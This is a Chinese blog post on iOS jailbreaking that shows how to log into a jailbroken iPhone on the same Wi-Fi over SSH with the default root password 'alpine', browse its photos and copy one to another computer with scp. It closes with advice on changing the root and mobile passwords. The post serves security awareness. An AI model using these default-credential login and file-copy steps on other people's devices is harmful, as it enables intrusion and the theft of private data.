入侵越狱设备

就在前几天,国内大神级越狱团队盘古联合PP助手发布了iOS9.2~9.3的越狱工具,由于工作原因,我也在第一时间体验了iOS9.3.3的越狱,那到底什么是越狱呢?越狱,其实就是利用iOS系统的漏洞来获取设备的root权限。那越狱之后的设备有什么不同呢?个人觉得主要有两个方面:

一. 越狱之后的设备会开放iOS完整的文件系统

通过iTools之类的软件,我们可以查看未越狱设备开放的用户文件系统(路径:/var/mobile/Media),如下图

入侵越狱设备_第1张图片
iTools截图


在这个文件系统中,我们能够获取到的只有照片、视频、iTunes音乐、电子书等等文件,而越狱之后则会开放完整的iOS文件系统,如下图:

入侵越狱设备_第2张图片
iFile截屏
入侵越狱设备_第3张图片
iFile截屏

可以说越狱之后,整个iOS系统的所有文件包括系统文件和用户文件都暴露在我们面前了,我们可以进行任意的读写操作

二.  越狱设备可以绕过苹果的证书校验,安装其他途径的软件和插件

未越狱设备安装软件有三个途径:1. AppStore,AppStore上面的软件都是经过苹果审核和签名认证的,基本上不会有危害用户的行为  2.用苹果企业开发者证书打包的App可以通过浏览器直接安装在iPhone上,这种App就没有经过苹果审核  3. 作为开发者,可以利用Xcode直接将代码运行在手机上进行真机测试  上面三种途径,都是需要经过苹果的证书校验,将App安装在固定的文件夹下。而越狱设备在安装了openssh(也是我们入侵越狱设备的工具)和AppSync两个插件之后,就可以绕过苹果的验证,任意安装其他途径的软件和插件,实现一些未越狱设备不可能实现的功能,如更改壁纸、主题、通话短信增强、玩破解游戏等等。

说了这两点,看起来越狱设备要强大的多,但是不建议越狱!不建议越狱!不建议越狱!用iPhone很大的原因是因为iOS系统运行流畅,操作简单,安全稳定,如果想玩机,那就用Android好了,可玩度要高的多。越狱之后的设备有很多缺点,系统会变卡,软件插件冲突,耗电量增加,放弃安全机制等等,前几年电子城的商贩忽悠人越狱的说法是越狱之后可以免费下载软件游戏,实际上越狱之后在AppStore上下载收费软件还是需要收费,而且越狱市场Cydia上也有收费软件,App内也会有内购。

如果说设备一旦越狱,一定要做好相应的防范措施,第一件就是更改openssh的密码,如果未修改,那么有心之人就能很轻易的远程登录你的设备,之后手机便无隐私可言。接下来我们来看一下怎样通过openssh入侵未修改密码的越狱设备

1. 首先要保证和目标设备处在同一个wifi下

通过局域网扫描软件可以查看同一个wifi下的其他设备的IP,这里为了方便,我就在越狱设备上直接查看IP地址了(点击设置 -> 无线局域网 -> 连接的wifi热点),记录下IP,我这里是192.168.3.6

2. 通过终端远程登录越狱设备

mac下可以直接使用终端来进行操作,windows下可以用Putty等,大同小异,这里就以mac为例。打开终端,通过openssh连接远程设备

入侵越狱设备_第4张图片
终端截图

依次输入上图标出的几条命令:

1. 输入ssh [email protected]并回车    连接同一wifi下IP地址为192.168.3.6的主机

2. 提示之前未建立过连接,询问是否连接(下次登录就没有这个提示了)输入 yes 并回车

3. 接下就是输入密码了,越狱开启openssh服务后root账户的密码默认是alpine,此处我们输入 alpine 并回车,输入密码时是没有任何字符或者长度的显示的,直接输完回车就好。(如果目标设备修改过密码,这里我们就登录不上了)

4. 登录成功之后再输入 pwd回车可以查看当前目录,默认在/var/root

现在以root账户登录成功,之后我们就可以通过相应的命令让设备关机重启、删除系统文件、查看任意文件,就像在自己的设备上操作一样。接下来我们查看该设备中的照片,还记得开始说的未越狱设备开放的用户文件系统的路径吗?/var/mobile/Media,手机中的照片就在这个路径下

终端截图

切换到照片文件夹的目录下  cd /var/mobile/Media/DCIM/100APPLE/ 回车

ls回车  列出此目录下的所有文件

此时我们可以看到该文件夹中的照片了(测试设备上只有几张截图),现在我们是通过终端查找到照片,无法直接查看,接下来还需要将照片发送到电脑上进行查看。(此处我是将mac也当成了一个远程设备进行文件的拷贝,如果有更好的方法可以留言)

终端截图

scp -r IMG_0008.PNG [email protected]:     利用scp指令将IMG_0008.PNG文件拷贝到IP地址为192.168.3.7(电脑的IP地址)的主机的liuhaiyang(电脑当前登录的账户)中

此时提示Connection refused,连接被拒绝了,因为mac默认是拒绝远程登录的,需要先设置一下

入侵越狱设备_第5张图片
mac设置允许远程登录

设置完毕之后,再次运行此命令

拷贝成功

输入 scp -r IMG_0008.PNG [email protected]: 并回车,提示输入密码,即电脑当前登录账户的密码,回车之后开始利用wifi网络进行文件的拷贝

然后我们就可以在mac中看到拷贝过来的文件了

入侵越狱设备_第6张图片

ok,至此,我们就利用openssh入侵了同个wifi下的越狱设备,这里我只是简单拷贝了一张照片,可以设想,在一些公共场合的wifi环境下,若是有人通过这种手段,不仅仅可以获取照片视频什么的,还能获取你的联系人、短信、通话记录、邮件等等,甚至微信沙盒中的聊天记录。。。

那么如何防止越狱设备被入侵呢?一. 不安装openssh,这样的话无法安装未经Apple签名认证的App  二.  修改openssh的密码,尽量设置一个复杂的密码防止暴力破解。上面我只说了root账户,实际上有两个账户,一个是root账户,一个是mobile账户,mobile账户的权限只在用户文件系统下,这两个账户的密码都是需要修改的。至于怎么修改,非常简单,百度一下有的是,今天太晚就不写了,明天再更新吧

补充修改密码的方法:

入侵越狱设备_第7张图片

首先还是一样登录越狱设备,如果未修改密码,默认是alpine,登录成功后输入  passwd 修改密码,接下来需要我们输入两遍新密码,同样还是没有任何提示,输完直接回车就行

之后我们可以重新登录试试密码修改成功没有

重新登录

输入login进行登录,之后输入要登录的账户,这里我们要登录root账户,所以输入 root,然后再输入新密码,则可以登录成功,至此root账户的密码修改完毕

除了root账户外,还有一个mobile账户也是需要我们修改的。以默认密码 alpine 登录mobile账户,然后以相同的办法修改密码,只不过将root换成mobile就可以了

入侵越狱设备_第8张图片
修改mobile账户密码

以上纯属个人观点,若有不当之处敬请指正

你可能感兴趣的:(入侵越狱设备)